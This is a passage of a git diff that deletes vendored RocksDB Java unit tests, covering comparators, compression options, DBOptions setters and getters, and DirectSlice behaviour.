-        return new Comparator(new ComparatorOptions()) {
-
-          @Override
-          public String name() {
-            return "test.AscendingIntKeyComparator";
-          }
-
-          @Override
-          public int compare(final Slice a, final Slice b) {
-            return compareIntKeys(a.data(), b.data());
-          }
-        };
-      }
-    };
-
-    // test the round-tripability of keys written and read with the Comparator
-    comparatorTest.testRoundtripCf(FileSystems.getDefault().getPath(
-        dbFolder.getRoot().getAbsolutePath()));
-  }
-
-  @Test
-  public void builtinForwardComparator()
-      throws RocksDBException {
-    try (final Options options = new Options()
-          .setCreateIfMissing(true)
-          .setComparator(BuiltinComparator.BYTEWISE_COMPARATOR);
-         final RocksDB rocksDb = RocksDB.open(options,
-             dbFolder.getRoot().getAbsolutePath())
-    ) {
-      rocksDb.put("abc1".getBytes(), "abc1".getBytes());
-      rocksDb.put("abc2".getBytes(), "abc2".getBytes());
-      rocksDb.put("abc3".getBytes(), "abc3".getBytes());
-
-      try(final RocksIterator rocksIterator = rocksDb.newIterator()) {
-        // Iterate over keys using a iterator
-        rocksIterator.seekToFirst();
-        assertThat(rocksIterator.isValid()).isTrue();
-        assertThat(rocksIterator.key()).isEqualTo(
-            "abc1".getBytes());
-        assertThat(rocksIterator.value()).isEqualTo(
-            "abc1".getBytes());
-        rocksIterator.next();
-        assertThat(rocksIterator.isValid()).isTrue();
-        assertThat(rocksIterator.key()).isEqualTo(
-            "abc2".getBytes());
-        assertThat(rocksIterator.value()).isEqualTo(
-            "abc2".getBytes());
-        rocksIterator.next();
-        assertThat(rocksIterator.isValid()).isTrue();
-        assertThat(rocksIterator.key()).isEqualTo(
-            "abc3".getBytes());
-        assertThat(rocksIterator.value()).isEqualTo(
-            "abc3".getBytes());
-        rocksIterator.next();
-        assertThat(rocksIterator.isValid()).isFalse();
-        // Get last one
-        rocksIterator.seekToLast();
-        assertThat(rocksIterator.isValid()).isTrue();
-        assertThat(rocksIterator.key()).isEqualTo(
-            "abc3".getBytes());
-        assertThat(rocksIterator.value()).isEqualTo(
-            "abc3".getBytes());
-        // Seek for abc
-        rocksIterator.seek("abc".getBytes());
-        assertThat(rocksIterator.isValid()).isTrue();
-        assertThat(rocksIterator.key()).isEqualTo(
-            "abc1".getBytes());
-        assertThat(rocksIterator.value()).isEqualTo(
-            "abc1".getBytes());
-      }
-    }
-  }
-
-  @Test
-  public void builtinReverseComparator()
-      throws RocksDBException {
-    try (final Options options = new Options()
-      .setCreateIfMissing(true)
-      .setComparator(BuiltinComparator.REVERSE_BYTEWISE_COMPARATOR);
-         final RocksDB rocksDb = RocksDB.open(options,
-             dbFolder.getRoot().getAbsolutePath())
-    ) {
-
-      rocksDb.put("abc1".getBytes(), "abc1".getBytes());
-      rocksDb.put("abc2".getBytes(), "abc2".getBytes());
-      rocksDb.put("abc3".getBytes(), "abc3".getBytes());
-
-      try (final RocksIterator rocksIterator = rocksDb.newIterator()) {
-        // Iterate over keys using a iterator
-        rocksIterator.seekToFirst();
-        assertThat(rocksIterator.isValid()).isTrue();
-        assertThat(rocksIterator.key()).isEqualTo(
-            "abc3".getBytes());
-        assertThat(rocksIterator.value()).isEqualTo(
-            "abc3".getBytes());
-        rocksIterator.next();
-        assertThat(rocksIterator.isValid()).isTrue();
-        assertThat(rocksIterator.key()).isEqualTo(
-            "abc2".getBytes());
-        assertThat(rocksIterator.value()).isEqualTo(
-            "abc2".getBytes());
-        rocksIterator.next();
-        assertThat(rocksIterator.isValid()).isTrue();
-        assertThat(rocksIterator.key()).isEqualTo(
-            "abc1".getBytes());
-        assertThat(rocksIterator.value()).isEqualTo(
-            "abc1".getBytes());
-        rocksIterator.next();
-        assertThat(rocksIterator.isValid()).isFalse();
-        // Get last one
-        rocksIterator.seekToLast();
-        assertThat(rocksIterator.isValid()).isTrue();
-        assertThat(rocksIterator.key()).isEqualTo(
-            "abc1".getBytes());
-        assertThat(rocksIterator.value()).isEqualTo(
-            "abc1".getBytes());
-        // Will be invalid because abc is after abc1
-        rocksIterator.seek("abc".getBytes());
-        assertThat(rocksIterator.isValid()).isFalse();
-        // Will be abc3 because the next one after abc999
-        // is abc3
-        rocksIterator.seek("abc999".getBytes());
-        assertThat(rocksIterator.key()).isEqualTo(
-            "abc3".getBytes());
-        assertThat(rocksIterator.value()).isEqualTo(
-            "abc3".getBytes());
-      }
-    }
-  }
-
-  @Test
-  public void builtinComparatorEnum(){
-    assertThat(BuiltinComparator.BYTEWISE_COMPARATOR.ordinal())
-        .isEqualTo(0);
-    assertThat(
-        BuiltinComparator.REVERSE_BYTEWISE_COMPARATOR.ordinal())
-        .isEqualTo(1);
-    assertThat(BuiltinComparator.values().length).isEqualTo(2);
-    assertThat(BuiltinComparator.valueOf("BYTEWISE_COMPARATOR")).
-        isEqualTo(BuiltinComparator.BYTEWISE_COMPARATOR);
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/CompressionOptionsTest.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/CompressionOptionsTest.java
deleted file mode 100644
index c49224c..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/CompressionOptionsTest.java
+++ /dev/null
@@ -1,53 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-import org.junit.Test;
-
-import static org.assertj.core.api.Assertions.assertThat;
-
-public class CompressionOptionsTest {
-
-  static {
-    RocksDB.loadLibrary();
-  }
-
-  @Test
-  public void windowBits() {
-    final int windowBits = 7;
-    try(final CompressionOptions opt = new CompressionOptions()) {
-      opt.setWindowBits(windowBits);
-      assertThat(opt.windowBits()).isEqualTo(windowBits);
-    }
-  }
-
-  @Test
-  public void level() {
-    final int level = 6;
-    try(final CompressionOptions opt = new CompressionOptions()) {
-      opt.setLevel(level);
-      assertThat(opt.level()).isEqualTo(level);
-    }
-  }
-
-  @Test
-  public void strategy() {
-    final int strategy = 2;
-    try(final CompressionOptions opt = new CompressionOptions()) {
-      opt.setStrategy(strategy);
-      assertThat(opt.strategy()).isEqualTo(strategy);
-    }
-  }
-
-  @Test
-  public void maxDictBytes() {
-    final int maxDictBytes = 999;
-    try(final CompressionOptions opt = new CompressionOptions()) {
-      opt.setMaxDictBytes(maxDictBytes);
-      assertThat(opt.maxDictBytes()).isEqualTo(maxDictBytes);
-    }
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/CompressionTypesTest.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/CompressionTypesTest.java
deleted file mode 100644
index e26cc0a..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/CompressionTypesTest.java
+++ /dev/null
@@ -1,20 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-import org.junit.Test;
-
-
-public class CompressionTypesTest {
-  @Test
-  public void getCompressionType() {
-    for (final CompressionType compressionType : CompressionType.values()) {
-      String libraryName = compressionType.getLibraryName();
-      compressionType.equals(CompressionType.getCompressionType(
-          libraryName));
-    }
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/DBOptionsTest.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/DBOptionsTest.java
deleted file mode 100644
index 11b7435..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/DBOptionsTest.java
+++ /dev/null
@@ -1,637 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-import org.junit.ClassRule;
-import org.junit.Test;
-
-import java.nio.file.Paths;
-import java.util.*;
-
-import static org.assertj.core.api.Assertions.assertThat;
-
-public class DBOptionsTest {
-
-  @ClassRule
-  public static final RocksMemoryResource rocksMemoryResource =
-      new RocksMemoryResource();
-
-  public static final Random rand = PlatformRandomHelper.
-      getPlatformSpecificRandomFactory();
-
-  @Test
-  public void getDBOptionsFromProps() {
-    // setup sample properties
-    final Properties properties = new Properties();
-    properties.put("allow_mmap_reads", "true");
-    properties.put("bytes_per_sync", "13");
-    try(final DBOptions opt = DBOptions.getDBOptionsFromProps(properties)) {
-      assertThat(opt).isNotNull();
-      assertThat(String.valueOf(opt.allowMmapReads())).
-          isEqualTo(properties.get("allow_mmap_reads"));
-      assertThat(String.valueOf(opt.bytesPerSync())).
-          isEqualTo(properties.get("bytes_per_sync"));
-    }
-  }
-
-  @Test
-  public void failDBOptionsFromPropsWithIllegalValue() {
-    // setup sample properties
-    final Properties properties = new Properties();
-    properties.put("tomato", "1024");
-    properties.put("burger", "2");
-    try(final DBOptions opt = DBOptions.getDBOptionsFromProps(properties)) {
-      assertThat(opt).isNull();
-    }
-  }
-
-  @Test(expected = IllegalArgumentException.class)
-  public void failDBOptionsFromPropsWithNullValue() {
-    try(final DBOptions opt = DBOptions.getDBOptionsFromProps(null)) {
-      //no-op
-    }
-  }
-
-  @Test(expected = IllegalArgumentException.class)
-  public void failDBOptionsFromPropsWithEmptyProps() {
-    try(final DBOptions opt = DBOptions.getDBOptionsFromProps(
-        new Properties())) {
-      //no-op
-    }
-  }
-
-  @Test
-  public void linkageOfPrepMethods() {
-    try (final DBOptions opt = new DBOptions()) {
-      opt.optimizeForSmallDb();
-    }
-  }
-
-  @Test
-  public void env() {
-    try (final DBOptions opt = new DBOptions();
-         final Env env = Env.getDefault()) {
-      opt.setEnv(env);
-      assertThat(opt.getEnv()).isSameAs(env);
-    }
-  }
-
-  @Test
-  public void setIncreaseParallelism() {
-    try(final DBOptions opt = new DBOptions()) {
-      final int threads = Runtime.getRuntime().availableProcessors() * 2;
-      opt.setIncreaseParallelism(threads);
-    }
-  }
-
-  @Test
-  public void createIfMissing() {
-    try(final DBOptions opt = new DBOptions()) {
-      final boolean boolValue = rand.nextBoolean();
-      opt.setCreateIfMissing(boolValue);
-      assertThat(opt.createIfMissing()).isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void createMissingColumnFamilies() {
-    try(final DBOptions opt = new DBOptions()) {
-      final boolean boolValue = rand.nextBoolean();
-      opt.setCreateMissingColumnFamilies(boolValue);
-      assertThat(opt.createMissingColumnFamilies()).isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void errorIfExists() {
-    try(final DBOptions opt = new DBOptions()) {
-      final boolean boolValue = rand.nextBoolean();
-      opt.setErrorIfExists(boolValue);
-      assertThat(opt.errorIfExists()).isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void paranoidChecks() {
-    try(final DBOptions opt = new DBOptions()) {
-      final boolean boolValue = rand.nextBoolean();
-      opt.setParanoidChecks(boolValue);
-      assertThat(opt.paranoidChecks()).isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void maxTotalWalSize() {
-    try(final DBOptions opt = new DBOptions()) {
-      final long longValue = rand.nextLong();
-      opt.setMaxTotalWalSize(longValue);
-      assertThat(opt.maxTotalWalSize()).isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void maxOpenFiles() {
-    try(final DBOptions opt = new DBOptions()) {
-      final int intValue = rand.nextInt();
-      opt.setMaxOpenFiles(intValue);
-      assertThat(opt.maxOpenFiles()).isEqualTo(intValue);
-    }
-  }
-
-  @Test
-  public void maxFileOpeningThreads() {
-    try(final DBOptions opt = new DBOptions()) {
-      final int intValue = rand.nextInt();
-      opt.setMaxFileOpeningThreads(intValue);
-      assertThat(opt.maxFileOpeningThreads()).isEqualTo(intValue);
-    }
-  }
-
-  @Test
-  public void useFsync() {
-    try(final DBOptions opt = new DBOptions()) {
-      final boolean boolValue = rand.nextBoolean();
-      opt.setUseFsync(boolValue);
-      assertThat(opt.useFsync()).isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void dbPaths() {
-    final List<DbPath> dbPaths = new ArrayList<>();
-    dbPaths.add(new DbPath(Paths.get("/a"), 10));
-    dbPaths.add(new DbPath(Paths.get("/b"), 100));
-    dbPaths.add(new DbPath(Paths.get("/c"), 1000));
-
-    try(final DBOptions opt = new DBOptions()) {
-      assertThat(opt.dbPaths()).isEqualTo(Collections.emptyList());
-
-      opt.setDbPaths(dbPaths);
-
-      assertThat(opt.dbPaths()).isEqualTo(dbPaths);
-    }
-  }
-
-  @Test
-  public void dbLogDir() {
-    try(final DBOptions opt = new DBOptions()) {
-      final String str = "path/to/DbLogDir";
-      opt.setDbLogDir(str);
-      assertThat(opt.dbLogDir()).isEqualTo(str);
-    }
-  }
-
-  @Test
-  public void walDir() {
-    try(final DBOptions opt = new DBOptions()) {
-      final String str = "path/to/WalDir";
-      opt.setWalDir(str);
-      assertThat(opt.walDir()).isEqualTo(str);
-    }
-  }
-
-  @Test
-  public void deleteObsoleteFilesPeriodMicros() {
-    try(final DBOptions opt = new DBOptions()) {
-      final long longValue = rand.nextLong();
-      opt.setDeleteObsoleteFilesPeriodMicros(longValue);
-      assertThat(opt.deleteObsoleteFilesPeriodMicros()).isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void baseBackgroundCompactions() {
-    try (final DBOptions opt = new DBOptions()) {
-      final int intValue = rand.nextInt();
-      opt.setBaseBackgroundCompactions(intValue);
-      assertThat(opt.baseBackgroundCompactions()).
-          isEqualTo(intValue);
-    }
-  }
-
-  @Test
-  public void maxBackgroundCompactions() {
-    try(final DBOptions opt = new DBOptions()) {
-      final int intValue = rand.nextInt();
-      opt.setMaxBackgroundCompactions(intValue);
-      assertThat(opt.maxBackgroundCompactions()).isEqualTo(intValue);
-    }
-  }
-
-  @Test
-  public void maxSubcompactions() {
-    try (final DBOptions opt = new DBOptions()) {
-      final int intValue = rand.nextInt();
-      opt.setMaxSubcompactions(intValue);
-      assertThat(opt.maxSubcompactions()).
-          isEqualTo(intValue);
-    }
-  }
-
-  @Test
-  public void maxBackgroundFlushes() {
-    try(final DBOptions opt = new DBOptions()) {
-      final int intValue = rand.nextInt();
-      opt.setMaxBackgroundFlushes(intValue);
-      assertThat(opt.maxBackgroundFlushes()).isEqualTo(intValue);
-    }
-  }
-
-  @Test
-  public void maxLogFileSize() throws RocksDBException {
-    try(final DBOptions opt = new DBOptions()) {
-      final long longValue = rand.nextLong();
-      opt.setMaxLogFileSize(longValue);
-      assertThat(opt.maxLogFileSize()).isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void logFileTimeToRoll() throws RocksDBException {
-    try(final DBOptions opt = new DBOptions()) {
-      final long longValue = rand.nextLong();
-      opt.setLogFileTimeToRoll(longValue);
-      assertThat(opt.logFileTimeToRoll()).isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void keepLogFileNum() throws RocksDBException {
-    try(final DBOptions opt = new DBOptions()) {
-      final long longValue = rand.nextLong();
-      opt.setKeepLogFileNum(longValue);
-      assertThat(opt.keepLogFileNum()).isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void recycleLogFileNum() throws RocksDBException {
-    try(final DBOptions opt = new DBOptions()) {
-      final long longValue = rand.nextLong();
-      opt.setRecycleLogFileNum(longValue);
-      assertThat(opt.recycleLogFileNum()).isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void maxManifestFileSize() {
-    try(final DBOptions opt = new DBOptions()) {
-      final long longValue = rand.nextLong();
-      opt.setMaxManifestFileSize(longValue);
-      assertThat(opt.maxManifestFileSize()).isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void tableCacheNumshardbits() {
-    try(final DBOptions opt = new DBOptions()) {
-      final int intValue = rand.nextInt();
-      opt.setTableCacheNumshardbits(intValue);
-      assertThat(opt.tableCacheNumshardbits()).isEqualTo(intValue);
-    }
-  }
-
-  @Test
-  public void walSizeLimitMB() {
-    try(final DBOptions opt = new DBOptions()) {
-      final long longValue = rand.nextLong();
-      opt.setWalSizeLimitMB(longValue);
-      assertThat(opt.walSizeLimitMB()).isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void walTtlSeconds() {
-    try(final DBOptions opt = new DBOptions()) {
-      final long longValue = rand.nextLong();
-      opt.setWalTtlSeconds(longValue);
-      assertThat(opt.walTtlSeconds()).isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void manifestPreallocationSize() throws RocksDBException {
-    try(final DBOptions opt = new DBOptions()) {
-      final long longValue = rand.nextLong();
-      opt.setManifestPreallocationSize(longValue);
-      assertThat(opt.manifestPreallocationSize()).isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void useDirectReads() {
-    try(final DBOptions opt = new DBOptions()) {
-      final boolean boolValue = rand.nextBoolean();
-      opt.setUseDirectReads(boolValue);
-      assertThat(opt.useDirectReads()).isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void useDirectIoForFlushAndCompaction() {
-    try(final DBOptions opt = new DBOptions()) {
-      final boolean boolValue = rand.nextBoolean();
-      opt.setUseDirectIoForFlushAndCompaction(boolValue);
-      assertThat(opt.useDirectIoForFlushAndCompaction()).isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void allowFAllocate() {
-    try(final DBOptions opt = new DBOptions()) {
-      final boolean boolValue = rand.nextBoolean();
-      opt.setAllowFAllocate(boolValue);
-      assertThat(opt.allowFAllocate()).isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void allowMmapReads() {
-    try(final DBOptions opt = new DBOptions()) {
-      final boolean boolValue = rand.nextBoolean();
-      opt.setAllowMmapReads(boolValue);
-      assertThat(opt.allowMmapReads()).isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void allowMmapWrites() {
-    try(final DBOptions opt = new DBOptions()) {
-      final boolean boolValue = rand.nextBoolean();
-      opt.setAllowMmapWrites(boolValue);
-      assertThat(opt.allowMmapWrites()).isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void isFdCloseOnExec() {
-    try(final DBOptions opt = new DBOptions()) {
-      final boolean boolValue = rand.nextBoolean();
-      opt.setIsFdCloseOnExec(boolValue);
-      assertThat(opt.isFdCloseOnExec()).isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void statsDumpPeriodSec() {
-    try(final DBOptions opt = new DBOptions()) {
-      final int intValue = rand.nextInt();
-      opt.setStatsDumpPeriodSec(intValue);
-      assertThat(opt.statsDumpPeriodSec()).isEqualTo(intValue);
-    }
-  }
-
-  @Test
-  public void adviseRandomOnOpen() {
-    try(final DBOptions opt = new DBOptions()) {
-      final boolean boolValue = rand.nextBoolean();
-      opt.setAdviseRandomOnOpen(boolValue);
-      assertThat(opt.adviseRandomOnOpen()).isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void dbWriteBufferSize() {
-    try(final DBOptions opt = new DBOptions()) {
-      final long longValue = rand.nextLong();
-      opt.setDbWriteBufferSize(longValue);
-      assertThat(opt.dbWriteBufferSize()).isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void accessHintOnCompactionStart() {
-    try(final DBOptions opt = new DBOptions()) {
-      final AccessHint accessHint = AccessHint.SEQUENTIAL;
-      opt.setAccessHintOnCompactionStart(accessHint);
-      assertThat(opt.accessHintOnCompactionStart()).isEqualTo(accessHint);
-    }
-  }
-
-  @Test
-  public void newTableReaderForCompactionInputs() {
-    try(final DBOptions opt = new DBOptions()) {
-      final boolean boolValue = rand.nextBoolean();
-      opt.setNewTableReaderForCompactionInputs(boolValue);
-      assertThat(opt.newTableReaderForCompactionInputs()).isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void compactionReadaheadSize() {
-    try(final DBOptions opt = new DBOptions()) {
-      final long longValue = rand.nextLong();
-      opt.setCompactionReadaheadSize(longValue);
-      assertThat(opt.compactionReadaheadSize()).isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void randomAccessMaxBufferSize() {
-    try(final DBOptions opt = new DBOptions()) {
-      final long longValue = rand.nextLong();
-      opt.setRandomAccessMaxBufferSize(longValue);
-      assertThat(opt.randomAccessMaxBufferSize()).isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void writableFileMaxBufferSize() {
-    try(final DBOptions opt = new DBOptions()) {
-      final long longValue = rand.nextLong();
-      opt.setWritableFileMaxBufferSize(longValue);
-      assertThat(opt.writableFileMaxBufferSize()).isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void useAdaptiveMutex() {
-    try(final DBOptions opt = new DBOptions()) {
-      final boolean boolValue = rand.nextBoolean();
-      opt.setUseAdaptiveMutex(boolValue);
-      assertThat(opt.useAdaptiveMutex()).isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void bytesPerSync() {
-    try(final DBOptions opt = new DBOptions()) {
-      final long longValue = rand.nextLong();
-      opt.setBytesPerSync(longValue);
-      assertThat(opt.bytesPerSync()).isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void walBytesPerSync() {
-    try(final DBOptions opt = new DBOptions()) {
-      final long longValue = rand.nextLong();
-      opt.setWalBytesPerSync(longValue);
-      assertThat(opt.walBytesPerSync()).isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void enableThreadTracking() {
-    try (final DBOptions opt = new DBOptions()) {
-      final boolean boolValue = rand.nextBoolean();
-      opt.setEnableThreadTracking(boolValue);
-      assertThat(opt.enableThreadTracking()).isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void delayedWriteRate() {
-    try(final DBOptions opt = new DBOptions()) {
-      final long longValue = rand.nextLong();
-      opt.setDelayedWriteRate(longValue);
-      assertThat(opt.delayedWriteRate()).isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void allowConcurrentMemtableWrite() {
-    try (final DBOptions opt = new DBOptions()) {
-      final boolean boolValue = rand.nextBoolean();
-      opt.setAllowConcurrentMemtableWrite(boolValue);
-      assertThat(opt.allowConcurrentMemtableWrite()).isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void enableWriteThreadAdaptiveYield() {
-    try (final DBOptions opt = new DBOptions()) {
-      final boolean boolValue = rand.nextBoolean();
-      opt.setEnableWriteThreadAdaptiveYield(boolValue);
-      assertThat(opt.enableWriteThreadAdaptiveYield()).isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void writeThreadMaxYieldUsec() {
-    try (final DBOptions opt = new DBOptions()) {
-      final long longValue = rand.nextLong();
-      opt.setWriteThreadMaxYieldUsec(longValue);
-      assertThat(opt.writeThreadMaxYieldUsec()).isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void writeThreadSlowYieldUsec() {
-    try (final DBOptions opt = new DBOptions()) {
-      final long longValue = rand.nextLong();
-      opt.setWriteThreadSlowYieldUsec(longValue);
-      assertThat(opt.writeThreadSlowYieldUsec()).isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void skipStatsUpdateOnDbOpen() {
-    try (final DBOptions opt = new DBOptions()) {
-      final boolean boolValue = rand.nextBoolean();
-      opt.setSkipStatsUpdateOnDbOpen(boolValue);
-      assertThat(opt.skipStatsUpdateOnDbOpen()).isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void walRecoveryMode() {
-    try (final DBOptions opt = new DBOptions()) {
-      for (final WALRecoveryMode walRecoveryMode : WALRecoveryMode.values()) {
-        opt.setWalRecoveryMode(walRecoveryMode);
-        assertThat(opt.walRecoveryMode()).isEqualTo(walRecoveryMode);
-      }
-    }
-  }
-
-  @Test
-  public void allow2pc() {
-    try (final DBOptions opt = new DBOptions()) {
-      final boolean boolValue = rand.nextBoolean();
-      opt.setAllow2pc(boolValue);
-      assertThat(opt.allow2pc()).isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void rowCache() {
-    try (final DBOptions opt = new DBOptions()) {
-      assertThat(opt.rowCache()).isNull();
-
-      try(final Cache lruCache = new LRUCache(1000)) {
-        opt.setRowCache(lruCache);
-        assertThat(opt.rowCache()).isEqualTo(lruCache);
-      }
-
-      try(final Cache clockCache = new ClockCache(1000)) {
-        opt.setRowCache(clockCache);
-        assertThat(opt.rowCache()).isEqualTo(clockCache);
-      }
-    }
-  }
-
-  @Test
-  public void failIfOptionsFileError() {
-    try (final DBOptions opt = new DBOptions()) {
-      final boolean boolValue = rand.nextBoolean();
-      opt.setFailIfOptionsFileError(boolValue);
-      assertThat(opt.failIfOptionsFileError()).isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void dumpMallocStats() {
-    try (final DBOptions opt = new DBOptions()) {
-      final boolean boolValue = rand.nextBoolean();
-      opt.setDumpMallocStats(boolValue);
-      assertThat(opt.dumpMallocStats()).isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void avoidFlushDuringRecovery() {
-    try (final DBOptions opt = new DBOptions()) {
-      final boolean boolValue = rand.nextBoolean();
-      opt.setAvoidFlushDuringRecovery(boolValue);
-      assertThat(opt.avoidFlushDuringRecovery()).isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void avoidFlushDuringShutdown() {
-    try (final DBOptions opt = new DBOptions()) {
-      final boolean boolValue = rand.nextBoolean();
-      opt.setAvoidFlushDuringShutdown(boolValue);
-      assertThat(opt.avoidFlushDuringShutdown()).isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void rateLimiter() {
-    try(final DBOptions options = new DBOptions();
-        final DBOptions anotherOptions = new DBOptions();
-        final RateLimiter rateLimiter = new RateLimiter(1000, 100 * 1000, 1)) {
-      options.setRateLimiter(rateLimiter);
-      // Test with parameter initialization
-      anotherOptions.setRateLimiter(
-          new RateLimiter(1000));
-    }
-  }
-
-  @Test
-  public void statistics() {
-    try(final DBOptions options = new DBOptions()) {
-      final Statistics statistics = options.statistics();
-      assertThat(statistics).isNull();
-    }
-
-    try(final Statistics statistics = new Statistics();
-        final DBOptions options = new DBOptions().setStatistics(statistics);
-        final Statistics stats = options.statistics()) {
-      assertThat(stats).isNotNull();
-    }
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/DirectComparatorTest.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/DirectComparatorTest.java
deleted file mode 100644
index 9b593d0..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/DirectComparatorTest.java
+++ /dev/null
@@ -1,52 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-import org.junit.ClassRule;
-import org.junit.Rule;
-import org.junit.Test;
-import org.junit.rules.TemporaryFolder;
-
-import java.io.IOException;
-import java.nio.file.FileSystems;
-
-public class DirectComparatorTest {
-  @ClassRule
-  public static final RocksMemoryResource rocksMemoryResource =
-      new RocksMemoryResource();
-
-  @Rule
-  public TemporaryFolder dbFolder = new TemporaryFolder();
-
-  @Test
-  public void directComparator() throws IOException, RocksDBException {
-
-    final AbstractComparatorTest comparatorTest = new AbstractComparatorTest() {
-      @Override
-      public AbstractComparator getAscendingIntKeyComparator() {
-        return new DirectComparator(new ComparatorOptions()) {
-
-          @Override
-          public String name() {
-            return "test.AscendingIntKeyDirectComparator";
-          }
-
-          @Override
-          public int compare(final DirectSlice a, final DirectSlice b) {
-            final byte ax[] = new byte[4], bx[] = new byte[4];
-            a.data().get(ax);
-            b.data().get(bx);
-            return compareIntKeys(ax, bx);
-          }
-        };
-      }
-    };
-
-    // test the round-tripability of keys written and read with the DirectComparator
-    comparatorTest.testRoundtrip(FileSystems.getDefault().getPath(
-        dbFolder.getRoot().getAbsolutePath()));
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/DirectSliceTest.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/DirectSliceTest.java
deleted file mode 100644
index 48ae52a..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/DirectSliceTest.java
+++ /dev/null
@@ -1,93 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-package org.rocksdb;
-
-import org.junit.ClassRule;
-import org.junit.Test;
-
-import java.nio.ByteBuffer;
-
-import static org.assertj.core.api.Assertions.assertThat;
-
-public class DirectSliceTest {
-  @ClassRule
-  public static final RocksMemoryResource rocksMemoryResource =
-      new RocksMemoryResource();
-
-  @Test
-  public void directSlice() {
-    try(final DirectSlice directSlice = new DirectSlice("abc");
-        final DirectSlice otherSlice = new DirectSlice("abc")) {
-      assertThat(directSlice.toString()).isEqualTo("abc");
-      // clear first slice
-      directSlice.clear();
-      assertThat(directSlice.toString()).isEmpty();
-      // get first char in otherslice
-      assertThat(otherSlice.get(0)).isEqualTo("a".getBytes()[0]);
-      // remove prefix
-      otherSlice.removePrefix(1);
-      assertThat(otherSlice.toString()).isEqualTo("bc");
-    }
-  }
-
-  @Test
-  public void directSliceWithByteBuffer() {
-    final byte[] data = "Some text".getBytes();
-    final ByteBuffer buffer = ByteBuffer.allocateDirect(data.length + 1);
-    buffer.put(data);
-    buffer.put(data.length, (byte)0);
-
-    try(final DirectSlice directSlice = new DirectSlice(buffer)) {
-      assertThat(directSlice.toString()).isEqualTo("Some text");
-    }
-  }
-
-  @Test
-  public void directSliceWithByteBufferAndLength() {
-    final byte[] data = "Some text".getBytes();
-    final ByteBuffer buffer = ByteBuffer.allocateDirect(data.length);
-    buffer.put(data);
